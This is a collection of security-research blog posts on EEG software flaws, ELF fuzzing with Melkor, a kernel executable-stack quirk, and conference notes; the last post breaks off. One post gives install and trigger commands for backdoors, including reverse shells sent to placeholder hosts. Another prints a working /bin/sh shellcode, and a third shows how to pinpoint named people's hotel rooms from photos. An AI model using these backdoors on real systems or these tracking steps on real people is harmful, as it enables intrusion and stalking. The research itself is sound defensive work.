From its conception, EEG vendors created their own file formats. As a result, it was very difficult to share patients’ brain waves between hospitals and physicians. Years later, in 1992, the EDF format was defined and adopted by many vendors. It’s worth mentioning that EDF and its improved version EDF+ (2003), are now old. There are more recent file format specifications and implementations in EEG software; in other words, it’s a new playing field.

I spent some time inspecting brochures, manuals, and technical specifications in order to identify the most commonly used file formats. The following table shows that the most common formats are proprietary and EDF(+):
Physicians use client-side software to open files containing EEG data. The security problems associated with these applications are similar to those found in any software that has been developed insecurely. In the end, parsing EEG data is just like parsing any other file format, and parsing involves security risks.
 
I performed trivial file format fuzzing on some EDF samples containing brain waves in order to identify general software flaws, not only security flaws. Most applications crashed within a few seconds from this malformed data, and most crashes were caused by invalid memory dereferences and other conditions that may be security bugs.
 
For instance, I was able to force an abnormal termination in Persyst Advanced Review (Insight II), commercial software that opens “virtually all commercial EEG formats,” according to its website.

In the following video, I demonstrate other bugs I found in Natus Stellate Harmonie Viewer, BrainBay, and SigViewer (which uses the BioSig open-source software library):


I think that bugs in client-side applications are less relevant. The attack surface is reduced because this software is only being used by specialized people. I don’t imagine any exploit code in the future for EEG software, but attackers often launch surprising attacks, so it should still be secure.


MISC
When brain waves are communicated over the air via Bluetooth or WiFi, what about jamming? Easy to answer.
 
What about SHODAN, the search engine for the Internet of Things? I did some searches and found a few pieces of EEG equipment accessible on the Internet. The risk here is that an attacker could perform automated password cracking to gain unauthorized access through a Remote Desktop. I also noted that some equipment uses the old and unsupported Windows XP operating system. Hospitals, do you really need this equipment connected to the Internet?
STANDARDS
What about regulatory compliance? Well, some efforts have been made to treat EEG data properly. For example, the American Clinical Neurophysiology Society (ACNS) has created some guidelines.
·       (2008) Standard for Transferring Digital Neurophysiological Data Between Independent Computer Systems
·       (2006) Guideline 8: Guidelines for Recording Clinical EEG on Digital Media. Nevertheless, “magnetic storage and CD-ROMs” is mentioned here.

However, the guidelines are somewhat dated and do not consider the current technologies.
CONCLUSIONS
We need more security “in mind” for brain wave technology. Best practices, including secure design and secure programming, should be followed. I think that regulators should issue security requirements to ensure products treat brain waves in a secure manner.
 
We also need new standards and guidelines for the secure treatment of brain waves, not only from and for the health care industry, but for a wide range of industries where brain waves are used. To prevent an unauthorized person from reading or impersonating EEG data, vendors should implement authentication mechanisms before EEG data or streams are read or updated. Also, there must be authentication between the acquisition device, the EEG middleware, and the endpoints. Endpoints use decoded brain wave to perform tasks; possible EEG endpoints include a drone, prosthesis, biometric mechanism, and more.
 
The security of this technology is not keeping pace with the risks. By now, security could be improved by implementing the controls surrounding EEG technology such as SSL tunnels to encrypt brain waves in transit. Perhaps in the future we will have layer 7 bio-signal firewalls, sounds crazy right? But let’s consider that ten years ago nobody imagined an ICS / SCADA firewall / Intrusion Prevention System with Deep Packet Inspection in layer 7 to identify malformed packets while inspecting the network. The future is coming fast.
 
If you’re a developer, I encourage you to adopt more secure programming practices. If you’re a vendor, you should perform security testing on the medical devices and software you supply.
 
Finally, if you’re hooked on this topic and planning a trip to Spain, Alfonso Muñoz, a fellow Security Consultant at IOActive, will present “Cryptography with brainwaves for fun and… profit?” on March 3, 2016, at Rooted CON in Madrid.
 
Also, feel free to check out these explanatory articles, in which my research is mentioned:

·       The EEG Headband & Security
  
Happy brain waves hacking.
– Alejandro
EDITORIAL | October 16, 2015

Five Reasons Why You Should Go To BruCON

BruCON is one of the most important security conferences in Europe. Held each October, the ‘Bru’ in ‘BruCON’ refers to Brussels, the capital of Belgium, where it all started. Nowadays, it’s held in the beautiful city of Ghent, just 55 mins from its origin. I had the chance to attend this year, and here are the five things that make it a great conference, in my opinion.

You can check out BruCON’s promo video here: https://www.youtube.com/watch?v=ySmCRemtMc4.
1. The conference
Great talks presented by international speakers; from deeply technical talks, to threat intelligence and other high-level stuff. You might run into people and friends from Vegas or another security conference.
A circular and well illuminated stage. You better not be caught taking a nap, unless you want a picture of yourself sleeping on the Internet.

(Shyama Rose talking about BASE jumping and risk)

While paid trainings take place two or three days before the conference, free workshops are available to the public during the two-day conference.

(Beau Woods (@beauwoods) giving a cool workshop named:

«Escalating Privileges Through Better Communication»)

While at BruCON, I presented my research on security deficiencies in electroencephalography (EEG) technologies. EEG is a non-invasive method of recording electrical brain activity (synaptic activity between neurons) taken from the scalp. EEG has increasingly been adopted across different industries, and I showed how the technology is prone to common network and application attacks. I demonstrated brain signal sniffing and data tampering through man-in-the-middle attacks, as well as denial-of-service bugs in EEG servers. Client-side applications that analyze EEG data are also prone to application flaws, and I showed how trivial fuzzing can uncover many of them. You can find the related material here: slides, demos (videos) [resource no longer available], and my live talk (video).
2. The city
The medieval architecture in Ghent will enchant you. It’s a really cool city, everywhere you look. Full of restaurants, cafes, and of course, pubs. Students from all ages also make this city full of vibe. You can easily spend two more days and enjoy all Ghent has to offer.
All of this is just around the corner from the venue.
3. The b33r
I’m not a b33r connoisseur, but most of the beers I tasted while in Ghent were, according to my taste, really good. Belgium is catalogued as one of the best beer countries in the world, which speaks for itself. In a nice gesture by the conference organizers, speakers were given a single bottle of a hard-to-find beer, Westvleteren 12, which has been rated as “the best beer in the world.” I have no idea know how they got them, as the brewer does not produce large amounts of this beer and only sells it to a select few people.
Beer at the venue, beer between talks, and there was even a night where we mixed good beer with ice cream. It was interesting.
4. The venue
The conference is held in the heart of the city, near all the hotels, just two or three blocks from where you’re most likely to stay. The organizers thought out every single detail to help you arrive right on time at the venue.
The main hall is perfect for networking and serves b33r, coffee, and food all day, not only during specific hours.
A renowned hacker DJ is dropping some bass or a pianist girl (computer scientist who wrote code for Google) took turns to make those moments even better.

 

Wouldn’t be a good conference without a Wall of Sheep; it was RickRolled though ;D
(Picture taken by @sehnaoui)
The party venue, just three blocks from the stage, had a good hacker ambience and a good sound atmosphere created by two well-known DJs: @CountNinjula & @KeithMyers.

 

(Picture taken by @wimremes)
5. The old video game consoles
If you’re not interested in a talk, or simply bored, just head upstairs and travel back in time with a whole hall of old consoles. “Here comes a new challenger” are accepted…as long as there’s b33r or money involved.

 

 

 
Well, that’s it, another great security conference for you to consider in the future.
Finally, thanks to all this year’s organizers and volunteers. Perhaps you’ll join in next year 😉

 

(Photo taken by @SenseiZeon)
Cheers!

INSIGHTS | September 8, 2015

The Beauty of Old-school Backdoors

Currently, voodoo advanced rootkit techniques exist for persistence after you’ve got a shell during a pen test. Moreover, there are some bugdoorsimplemented on purpose by vendors, but that’s a different story. Beautiful techniques and code are available these days, but, do you remember that subtle code you used to use to sneak through the door? Enjoy that nostalgia by sharing your favorite one(s) using the #oldschoolbackdoors on social networks.

 

In this post, I present five Remote Administration Tools (RATs) a.k.a. backdoors that I personally used and admired. It’s important to mention that I used these tools as part of legal pen testing projects in order to show the importance of persistence and to measure defensive effectiveness against such tools.
1. Apache mod_rootme backdoor module (2004)

“mod_rootme is a very cool module that sets up a backdoor inside of Apache where a simple GET request will allow a remote administrator the ability to grab a root shell on the system without any logging.”

 

One of the most famous tools only required you to execute a simple makecommand to compile the shared object, copy it into the modules directory, insert “LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so” into httpd.conf, and restart the httpd daemon with ‘apachectl stop; apachectl start’. After that, a simple “GET root” would give you back a w00t shell.

 

2. raptor_winudf.sql – A MySQL UDF backdoor (2004–2006)

“This is a MySQL backdoor kit based on the UDFs (User Defined Functions) mechanism. Use it to spawn a reverse shell (netcat UDF on port 80/tcp) or to execute single OS commands (exec UDF).”

 

For this backdoor, you used a simple ‘#mysql -h x.x.x.x < raptor_winudf.sql’to inject the backdoor as a user-defined function. From there, you could execute commands with ‘mysql> select exec(‘ipconfig > c:out.txt’);’ from the MySQL shell.

 

A cool reverse-shell feature was implemented as well and could be called with ‘mysql> select netcat(‘y.y.y.y’);’ in order to send an interactive shell to port 80 on the host supplied (y.y.y.y). The screenshot below shows the variant for Linux.

Screenshot source:
http://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ (no longer active)
 
3. Winamp get_wbkdr.dll plugin backdoor (2006)

“wbkdr is a proof of concept Winamp backdoor that makes use of the plugin interface. It spawns cmd.exe on port 24501.”

 

This one was as easy as copying the DLL into C:Program FilesWinampPlugins and playing your favorite song with Winamp in order to get a pretty cmd.exeattached to the port 24501.

 

4. BIND reverse shell backdoor (2005)
This backdoor used an unpublished patch for BIND, the most used DNS daemon on the Internet, developed by a friend of mine from Argentina. Basically you had to patch the source, compile and run named, as root normally. Once running, sending a DNS request with ‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ would trigger a reverse shell to the host x.x.x.x on the port given.
5. Knock-out – a port-knocking based backdoor (2006)

This is backdoor I made using libpcap for packet sniffing (server) and libnet for packet crafting (client). I made use of the port-knocking technique to enable the backdoor, which could be a port bind or a reverse shell. The server and client use the same configuration file to determine which ports to knock and the time gap between each network packet sent. Knock-out supports TCP and UDP and is still working on recent Linux boxes (tested under Ubuntu Server 14.04).

 

I’d say most of these backdoors still work today. You should try them out. Also, I encourage you to share the rarest backdoors you ever seen, the ones that you liked the most, and the peculiar ones you tried and fell in love with. Don’t forget to use the #oldschoolbackdoors hashtag ;-).

INSIGHTS | November 6, 2014

ELF Parsing Bugs by Example with Melkor Fuzzer

Too often the development community continues to blindly trust the metadata in Executable and Linking Format (ELF) files. In this paper, Alejandro Hernández walks you through the testing process for seven applications and reveals the bugs that he found. He performed the tests using Melkor, a file format fuzzer he wrote specifically for ELF files.

 

Introduction

The ELF file format, like any other file format, is an array of bits and bytes interconnected through data structures. When interpreted by an ELF parser, an ELF file makes sense, depending upon the parsing context: runtime (execution view) or static (linking view).

In 1999, ELF was chosen as the standard binary file format for *NIX systems, and now, about 15 years later, we are still in many instances blindly trusting the (meta)data within ELF files, either as executable binaries, shared libraries, or relocation objects.

However, blind trust is not necessary. Fuzzing tools are available to run proper safety checks for every single untrusted field.

To demonstrate, I tested and found bugs in seven applications using Melkor, a file format fuzzer specifically for ELF files that I developed: https://github.com/IOActive/Melkor_ELF_Fuzzer.

The following were tested:

  • HT Editor 2.1.0
  • GCC (GNU Compiler) 4.8.1
  • Snowman Decompiler v0.0.5
  • GDB (GNU Debugger) 7.8
  • IDA Pro (Demo version) 6.6.140625
  • OpenBSD 5.5 ldconfig
  • OpenBSD 5.5 Kernel

Most, if not all, of these bugs were reported to the vendors or developers.

Almost all, if not all, were only crashes (invalid memory dereferences) and I did not validate whether they’re exploitable security bugs. Therefore, please do not expect a working command execution exploit at the end of this white paper.

Melkor is an intuitive and, therefore, easy-to-use fuzzer. To get started, you simply identify:

  • The kind of metadata you want to fuzz
  • A valid ELF file to use as a template
  • The number of desired test cases you want to generate (malformed ELF files that I call ‘orcs,’ as shown in my Black Hat Arsenal presentation, slides 51 and 52.1
  • The likelihood of each fuzzing rule as a percentage

Options supported by Melkor:

For a quiet output, use the -q switch. 1. – Melkor Test of HT Editor 2.1.0

HT (http://hte.sourceforge.net) is my favorite ELF editor. It has parsers for all internal metadata.

Test Case Generation

To start, we’ll fuzz only the ELF header, with a 20% chance of executing each fuzzing rule, to create 1000 test cases:

$./melkor -H templates/foo -l 20 -n 1000

You will find the test cases that are generated in the orcs_foo directory along with a detailed report explaining what was fuzzed internally.

Fuzzing the Parser

You could perform manually testing by supplying each orc (test case) as a parameter to the HT Editor. However, it would take a long time to test 1000 test cases.

For that reason, Melkor comes with two testing scripts:

  • For Linux, test_fuzzed.sh
  • For Windows systems, win_test_fuzzed.bat

To test the scripts automatically, enter:

$./test_fuzzed.sh orcs_foo/ “ht”

Every time HT Editor opens a valid ELF file, you must press the [F10] key to continue to

the next test case. The Bug

After 22 tries, the test case orc_0023 crashed the HT Editor:


The next step is to identify the cause of the crash by reading the detailed report generated by Melkor:


By debugging it with GDB, you would see:

 

 

Effectively, there is a NULL pointer dereference  in the instruction mov (%rdi),%rax. 2. – Melkor Test of GCC (GNU Compiler) 4.8.1

I consider the GCC to be the compiler of excellence. When you type gcc foo.c -o foo, you’re performing all the phases (compilation, linking, etc.); however, if you want only to compile, the -c is necessary, as in gcc -c foo.c, to create the ELF relocatable object foo.o.

Normally, relocations and/or symbols tables are an important part of the .o objects. This is what we are going to fuzz.

 

Test Case Generation

Inside the templates/ folder, a foo.o file is compiled with the same Makefile to create Melkor, which in turn will be used as a template to create 5000 (default -n option) malformed relocatable files. We instruct Melkor to fuzz the relocations within the file (-R) and the symbol tables (-s) as well:

 

$./melkor -Rs templates/foo.o

 

During the fuzzing process, you may see verbose output:

 

 

Fuzzing the Parser


 

In order to test GCC with every malformed .o object, a command like gcc -o output malformed.o must be executed. To do so automatically, the following arguments are supplied to the testing script:

 

$./test_fuzzed.sh orcs_foo.o/ “gcc –o output”

 

You can observe how mature GCC is and how it properly handles every malformed struct, field, size, etc.:

 

 

 

 

The Bug

 

Normally, in a Linux system, when a program fails due to memory corruption or an invalid memory dereference, it writes to STDERR the message: “Segmentation fault.” As a quick way to identify if we found bugs in the linker, we can simply look for that message in the output of the testing script (the script already redirected the STDERR of each test case to STDOUT).

 

$./test_fuzzed.sh orcs_foo.o/ “gcc –o output” | egrep “Testing program|Segmentation fault”

 

 

 

 

Filtering for only those that ended with a “Segmentation fault,” I saw that 197 of 5000 test cases triggered a bug.

 

3. – Melkor Test of the Snowman Decompiler v0.0.5

 

 

 

 

Snowman (http://derevenets.com) is a great native code to C/C++ decompiler for Windows. It’s free and supports PE and ELF formats in x86 and x86-64 architectures.

 

 

Test Case Generation


In the previous example, I could have mentioned that after a period of testing, I noticed that some applications properly validated all fields in the initial header and handled the errors. So, in order to fuzz more internal levels, I implemented the following metadata dependencies in Melkor, which shouldn’t be broken:

 

 

 

 

 

With these dependencies, it’s possible to corrupt deeper metadata without corrupting structures in higher levels. In the previous GCC example, it’s evident that these dependencies were in place transparently to reach the third and fourth levels of metadata, symbol tables, and relocation tables respectively. For more about dependencies in Melkor, see Melkor Documentation: ELF Metadata Dependencies2.

 

Continuing with Snowman, I created only 200 test cases with fuzzed sections in the Section Header Table (SHT), without touching the ELF header, using the default likelihood of fuzzing rules execution, which is 10%:

 

 

$./melkor -S templates/foo -n 200

 

 

Fuzzing the Parser


 

Since snowman.exe runs on Windows machines, I then copied the created test cases to the Windows box where Snowman was loaded and tested each case using win_test_fuzzed.bat as follows:

 

C:Usersnitr0usDownloads>melkor-v1.0win_test_fuzzed.bat orcs_foo_SHT_snowman snowman-v0.0.5-win-x64snowman.exe

 

For every opened snowman.exe for which there is no exception, it’s necessary to close the window with the [Alt] + [F4] keyboard combination. Sorry for the inconvenience but I kept the testing scripts as simple as possible.

 

 

The Bug


 

I was lucky on testing day. The second orc triggered an unhandled exception that made Snowman fail:

 

 

 

4. – Melkor Test of GDB (GNU Debugger) 7.8

 

 

 

 

GDB, the most used debugger in *NIX systems, is another great piece of code.

When you type gdb foo, the necessary ELF data structures and other metadata is parsed and prepared before the debugging process; however, when you execute a program within GDB, some other metadata is parsed.

 

Test Case Generation

 

 

 

Most applications rely on the SHT to reach more internal metadata; the data and the code itself, etc. As you likely noticed in the previous example and as you’ll see now with GDB, malformed SHTs might crash many applications. So, I created 2000 orcs with fuzzed SHTs:

 

$./melkor -S templates/foo -n 2000

 

To see the other examples, GDB, IDA Pro, ldconfig and OpenBSD kernel, please continue reading the white paper at http://www.ioactive.com/pdfs/IOActive_ELF_Parsing_with_Melkor.pdf

 

Conclusion

 

 

 

Clearly, we would be in error if we assumed that ELF files, due to the age of the format, are free from parsing mistakes; common parsing mistakes are still found.

It would also be a mistake to assume that parsers are just in the OS kernels, readelf or objdump. Many new programs support 32 and 64-bit ELF files, and antivirus engines, debuggers, OS kernels, reverse engineering tools, and even malware may contain ELF parsers.

 

I hope you have seen from these examples that fuzzing is a very helpful method to identify functional (and security) bugs in your parsers in an automated fashion. An attacker could convert a single crash into an exploitable security bug in certain circumstances or those small crashes could be employed as anti-reversing or anti-infection techniques.

 

 

Feel free to fuzz, crash, fix, and/or report the bugs you find to make better software.

 

 

Happy fuzzing.

 

Alejandro Hernández  @nitr0usm

Extract from white paper at IOActive_ELF_Parsing_with_Melkor

 

 

Acknowledgments

IOActive, Inc.

 

References

[1]  Alejandro Hernández. “In the lands of corrupted elves: Breaking ELF software with Melkor fuzzer.”  </wp-content/uploads/2014/11/us-14-Hernandez-Melkor-Slides.pdf>
[2] Melkor Documentation: ELF Metadata Dependencies and Fuzzing Rules. <https://github.com/IOActive/Melkor_ELF_Fuzzer/tree/master/docs>[3] IOActive Security Advisory: OpenBSD  5.5 Local Kernel Panic.<http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf>

INSIGHTS | May 7, 2014

Glass Reflections in Pictures + OSINT = More Accurate Location

By Alejandro Hernández – @nitr0usmx

Disclaimer: The aim of this article is to help people to be more careful when taking pictures through windows because they might reveal their location inadvertently. The technique presented here might be used for many different purposes, such as to track down the location of the bad guys, to simply know in which hotel is that nice room or by some people, to follow the tracks of their favorite artist.
All of the pictures presented here were posted by the owners on Twitter. The tools and information used to determine the locations where the pictures were taken are all publically available on the Internet. No illegal actions were performed in the work presented here. 

 
 
Introduction
Travelling can be enriching and inspiring, especially if you’re in a place you haven’t been before. Whether on vacation or travelling for business, one of the first things that people usually do, including myself, after arriving in their hotel room, is turn on the lights (even if daylight is still coming through the windows), jump on the bed to feel how comfortable it is, walk to the window, and admire the view. If you like what you see, sometimes you grab your camera and take a picture, regardless of reflections in the window.
Without considering geolocation metadata [1] (if enabled), reflections could be a way to get more accurate information about where a picture was taken. How could one of glass’ optical properties [2], reflection, disclose your location? Continue reading.
Of course pictures taken from windows disclose location information such as the city and/or streets; however, people don’t always disclose the specific name of the place they’re standing. Here is where reflections could be useful.
Sometimes, not all of the time, but sometimes, reflections contain recognizable elements that with a little extra help, such as OSINT (Open Source Intelligence) [3], could reveal a more accurate location. The OSINT elements that I used include:
       Google Earth 3D Buildings (http://www.google.com/earth/)
       Google Maps (and Street View) (http://maps.google.com)
       Emporis (buildings information) (http://www.emporis.com)
       SkyscraperPage (buildings information) (http://skyscraperpage.com)
       Foursquare (pictures uploaded by people) (http://foursquare.com)
       TripAdvisor (pictures uploaded by people) (http://www.tripadvisor.com)
       Hotels’ Websites
       Google.com
In the following case studies, I’ll present step-by-step instructions for how to get more accurate information about where a picture was taken using reflections.
CASE #1 – Miami, FL
Searching for “hotel view” pictures on Twitter, I found this one from Scott Hoying (a member of Pentatonix, an a cappella group of five vocalists):
 
Looking at his previous tweet:
 
 We know he was in Miami, but, where exactly? Whether or not you’ve been to Miami, it’s difficult to recognize the buildings outside the window:
 
 So, I went to Wikipedia to get the name of every member of the band:
I looked for them on Twitter and Instagram. Only one other member had published a picture from what appeared to be the same hotel:
I was relatively easy to find that view with Google Earth:
However, from that perspective, there are three hotels:
So, it’s time to focus on the reflection elements present in the picture (same element reflected in different angles and the portraits) as well as the pattern in the bed cover:
Two great resources for reference pictures, in addition to hotels’ websites, are Foursquare and TripAdvisor (some people like to show where they’re staying). So, after a couple of minutes analyzing pictures of the three possible hotels, I finally found our reflected elements in pictures uploaded by people and on the hotel’s website itself:
After some minutes, we can conclude that the band stayed at the Epic Hotel and, perhaps, in a Water View suite:
 
 
CASE #2 – Vancouver, Canada
The following picture was posted by a friend of mine with the comment that she was ready for her talk at #XXXX2014 conference in #Vancouver. The easiest way to get her location would have been to look for the list of partnering hotels for speakers at XXXX2014 conference, but what if the name of the conference hadn’t been available?
Let’s take the longer but more interesting path, starting with only the knowledge that this picture was taken in Vancouver:
The square lamp reflected is pretty clear, isn’t it? ;-). First, let’s find that building in front. For that, you could go straight to Google Earth with the 3D buildings layout enabled, but I preferred to dive into Vancouver’s pictures in Emporis:
We’ve found it’s the Convention Centre (and its exact location evidently). Now, it’s easy to match the perspective from which the picture was taken using Google Earth’s 3D buildings layout:
We see it, but, where are we standing? Another useful OSINT resource I used was the SkyscraperPage of Vancouver, which shows us two options:
 
By clicking on each mark we can see more detailed information. According to this website, the one on the right is used only for offices and retail, but not for lodging: 
However, the other one seems to be our building:
A quick search leads us to the Fairmont Pacific Rim’s Website, where it’s easy to find pictures from inside the hotel:
The virtual tour for the Deluxe Room has exactly the same view:
Turn our virtual head to the left… and voilà, our square lamp:
Now, let’s find out how high up it is to where the picture was taken. Let’s view our hotel from the Convention Center’s perspective and estimate the floor:
From my perspective, it appears to be between the 17th and 20th floor, so I asked the person who took the picture to corroborate:
 
CASE #3 – Des Moines, IA – 1
An easy one, there are not many tall buildings in Des Moines, Iowa, so it was sort of easy to spot this one:
It seems that the building in front is a parking garage. The drapes look narrow and are white / pearl color. The fans on the rooftop were easy to locate on Google Maps:
And we could corroborate using the Street View feature:
We found it was the Des Moines Marriott Downtown. Looking for pictures on TripAdvisor we’ve found what it seems to be the same drapery:
Which floor? Let’s move our head and look towards the window where the picture was taken:
The 3D model also helps:
And… almost!
CASE #4 – Des Moines, IA – 2
Another easy case from the same hotel as the previous case. Look at the detailed reflections: the beds, the portraits, the TV, etc.
These were easy-to-spot elements using Foursquare and TripAdvisor:
Misc. Ideas / Further Research
While brainstorming with my friend Diego Madero about reflections, he suggested going deeper by including image processing to separate the reflections from the original picture. It’s definitely a good idea; however, it takes time to do this (as far as I know).
We also discussed the idea that you could use the information disclosed in reflections to develop a profile of an individual. For example, if the person called room service (plates and bottles reflected), what brand of laptop they are using (logo reflected), or whether they are storing something in the safe (if it’s closed or there’s an indicator like an LED perhaps).
Conclusion
Clear and simple: the reflected images in pictures might disclose information that you wouldn’t be willing to share, such as your location or other personal details. If you don’t want to disclose your location, eliminate reflections by choosing a better angle or simply turning off all of the lights inside the room (including the TV) before taking the picture.
Also, it’s evident that reflections are not only present in windows. While I only considered reflections in windows from different hotels, other things can reflect the surrounding environment:
       “44 Impressive Examples of Reflection Photography”
Finally, do not forget that a reflection could be your enemy.
Recommendations
Here are some other useful links:
       “How to Eliminate Reflections in Glasses in Portraits”
       “How to remove the glare and brightness in an image (Image preprocessing)”
Thanks for reading.
References:
[1] “Geolocation”
[2] “Glass – Optical Properties”
[3] “OSINT – Open Source Intelligence”
INSIGHTS | November 27, 2013

A Short Tale About executable_stack in elf_read_implies_exec() in the Linux Kernel

This is a short and basic analysis I did when I was uncertain about code execution in the data memory segment. Later on, I describe what’s happening in the kernel side as well as what seems to be a small logic bug.
I’m not a kernel hacker/developer/ninja; I’m just a Linux user trying to figure out the reason of this behavior by looking in key places such as the ELF loader and other related functions. So, if you see any mistakes or you realize that I approached this in a wrong way, please let me know, I’d really appreciate that.
This article also could be useful for anyone starting in shellcoding since they might think their code is wrong when, in reality, there are other things around to take care of in order to test the functionality of their shellcodes or any other kind of code.
USER-LAND: Why is it possible to execute code in the data segment if it doesn’t have the PF_EXEC enabled?
A couple of weeks ago I was reading an article (in Spanish) about shellcodes creation in Linux x64. For demonstration purposes I’ll use this 64-bit execve(“/bin/sh”) shellcode: 

#include <unistd.h>

char shellcode[] =
“x48x31xd2x48x31xf6x48xbf”
“x2fx62x69x6ex2fx73x68x11”
“x48xc1xe7x08x48xc1xefx08”
“x57x48x89xe7x48xb8x3bx11”
“x11x11x11x11x11x11x48xc1”
“xe0x38x48xc1xe8x38x0fx05”;

int main(int argc, char ** argv) {
void (*fp)();
fp = (void(*)())shellcode;
(void)(*fp)();

return 0;
}

The author suggests the following for the proper execution of the shellcodes:
We compile and with the execstack utility we specify that the stack region used in the binary will be executable…”.

Immediately, I thought it was wrong because of the code to be executed would be placed in the ‘shellcode’ symbol in the .data section within the ELF file, which, in turn, would be in the data memory segment, not in the stack segment at runtime. For some reason, when trying to execute it without enabling the executable stack bit, it failed, and the opposite when it was enabled:

 

According to the execstack’s man-page:

“… ELF binaries and shared libraries now can be marked as requiring executable stack or not requiring it… This marking is done through the p_flags field in the PT_GNU_STACK program header entry… The marking is done automatically by recent GCC versions”.
It only modifies one bit adding the PF_EXEC flag to the PT_GNU_STACK program header. It also can be done by modifying the binary with an ELF editor such as HTEditor or at linking time by passing the argument ‘-z execstack’ to gcc. 
The change can be seen simply observing the flags RWE (Read, Write, Execution) using the readelf utility. In our case, only the ‘E’ flag was added to the stack memory segment:

 
The first loadable segment in both binaries, with the ‘E’ flag enabled, is where the code itself resides (the .text section) and the second one is where all our data resides. It’s also possible to map which bytes from each section correspond to which memory segments (remember, at runtime, the sections are not taken into account, only the program headers) using ‘readelf -l shellcode’.

So far, everything makes sense to me, but, wait a minute, the shellcode, or any other variable declared outside main(), is not supposed to be in the stack right? Instead, it should be placed in the section where the initialized data resides (as far as I know it’s normally in .data or .rodata). Let’s see where exactly it is by showing the symbol table and the corresponding section of each symbol (if it applies):

It’s pretty clear that our shellcode will be located at the memory address 0x00600840 in runtime and that the bytes reside in the .data section. The same result for the other binary, ‘shellcode_execstack’.

By default, the data memory segment doesn’t have the PF_EXEC flag enabled in its program header, that’s why it’s not possible to jump and execute code in that segment at runtime (Segmentation Fault), but: when the stack is executable, why is it also possible to execute code in the data segment if it doesn’t have that flag enabled? 

 
Is it a normal behavior or it’s a bug in the dynamic linker or kernel that doesn’t take into account that flag when loading ELFs? So, to take the dynamic linker out of the game, my fellow Ilja van Sprundel gave me the idea to compile with -static to create a standalone executable. A static binary doesn’t pass through the dynamic linker, instead, it’s loaded directly by the kernel (as far as I know). The same result was obtained with this one, so this result pointed directly to the kernel.

I tested this in a 2.6 kernel (x86_64) and in a 3.2 kernel (i686), and I got the same behavior in both.
KERNEL-LAND: Is that a bug in elf_read_implies_exec()?

Now, for the interesting part, what is really happening in the kernel side? I went straight to load_elf_binary()in linux-2.6.32.61/fs/binfmt_elf.c and found that the program header table is parsed to find the stack segment so as to set the executable_stack variable correctly:

     int executable_stack = EXSTACK_DEFAULT;

elf_ppnt = elf_phdata;
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
if (elf_ppnt->p_type == PT_GNU_STACK) {
if (elf_ppnt->p_flags & PF_X)
executable_stack = EXSTACK_ENABLE_X;

else
executable_stack = EXSTACK_DISABLE_X;
break;
}

Keep in mind that only those three constants about executable stack are defined in the kernel (linux-2.6.32.61/include/linux/binfmts.h):

/* Stack area protections */
#define EXSTACK_DEFAULT    0  /* Whatever the arch defaults to */
#define EXSTACK_DISABLE_X  1  /* Disable executable stacks */
#define EXSTACK_ENABLE_X   2  /* Enable executable stacks */

Later on, the process’ personality is updated as follows:

     /* Do this immediately, since STACK_TOP as used in setup_arg_pages may depend on the personality.  */
SET_PERSONALITY(loc->elf_ex);
     if (elf_read_implies_exec(loc->elf_ex, executable_stack))
current->personality |= READ_IMPLIES_EXEC;

if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
current->flags |= PF_RANDOMIZE;

elf_read_implies_exec() is a macro in linux-2.6.32.61/arch/x86/include/asm/elf.h:

/*
* An executable for which elf_read_implies_exec() returns TRUE 

 * will have the READ_IMPLIES_EXEC personality flag set automatically.
*/
#define elf_read_implies_exec(ex, executable_stack)
(executable_stack != EXSTACK_DISABLE_X)

In our case, having an ELF binary with the PF_EXEC flag enabled in the PT_GNU_STACK program header, that macro will return TRUE since EXSTACK_ENABLE_X != EXSTACK_DISABLE_X, thus, our process’ personality will have READ_IMPLIES_EXEC flag. This constant, READ_IMPLIES_EXEC, is checked in some memory related functions such as in mmap.c, mprotect.c and nommu.c (all in linux-2.6.32.61/mm/). For instance, when creating the VMAs (Virtual Memory Areas) by the do_mmap_pgoff() function in mmap.c, it verifies the personality so it can add the PROT_EXEC (execution allowed) to the memory segments [1]:

     /*
* Does the application expect PROT_READ to imply PROT_EXEC?
*
* (the exception is when the underlying filesystem is noexec
*  mounted, in which case we dont add PROT_EXEC.)
*/
if ((prot & PROT_READ) && (current->personality & READ_IMPLIES_EXEC))
if (!(file && (file->f_path.mnt->mnt_flags & MNT_NOEXEC)))
prot |= PROT_EXEC;

And basically, that’s the reason of why code in the data segment can be executed when the stack is executable.

On the other hand, I had an idea: to delete the PT_GNU_STACK program header by changing its corresponding program header type to any other random value. Doing that, executable_stack would remain EXSTACK_DEFAULT when compared in elf_read_implies_exec(), which would return TRUE, right? Let’s see:


The program header type was modified from 0x6474e551 (PT_GNU_STACK) to 0xfee1dead, and note that the second LOAD (data segment, where our code to be executed is) doesn’t have the ‘E’xecutable flag enabled: 

 

The code was executed even when the execution flag is not enabled in the program header that holds it. I think it’s a logic bug in elf_read_implies_exec() because one can simply delete the PT_GNU_STACK header as to set executable_stack = EXSTACK_DEFAULT, making elf_read_implies_exec() to return TRUE. Instead comparing against EXSTACK_DISABLE_X, it should return TRUE only if executable_stack is EXSTACK_ENABLE_X:

#define elf_read_implies_exec(ex, executable_stack)
(executable_stack == EXSTACK_ENABLE_X)

Anyway, perhaps that’s the normal behavior of the Linux kernel for some compatibility issues or something else, but isn’t it weird that making the stack executable or deleting the PT_GNU_STACK header all the memory segments are loaded with execution permissions even when the PF_EXEC flag is not set?

What do you think?
Side notes:
       Kernel developers pass loc->elf_ex and never use it in:
#define elf_read_implies_exec(ex, executable_stack) (executable_stack != EXSTACK_DISABLE_X)

       Two constants are defined but never used in the whole kernel code:
#define INTERPRETER_NONE 0
#define INTERPRETER_ELF  2
Finally, I’d like to thank my collegues Ilja van Sprundel and Diego Bauche Madero for giving me some ideas.
Thanks for reading.
References:
[1] “Understanding the Linux Virtual Memory Manager”. Mel Gorman.
Chapter 4 – Process Address Space.

 

INSIGHTS | April 16, 2013

Can GDB’s List Source Code Be Used for Evil Purposes?

One day while debugging an ELF executable with the GNU Debugger (GDB), I asked myself, “How does GDB know which file to read when you use the list command?” (For the uninformed, the list command prints a specified number of lines from a source code file -— ten lines is the default.)

 

Source code filenames are contained in the metadata of an ELF executable (in the .debug_line section, to be exact). When you use the list command, GDB will open(), read(), and display the file contents if and only if GDB has the permissions needed to read the source file. 

 

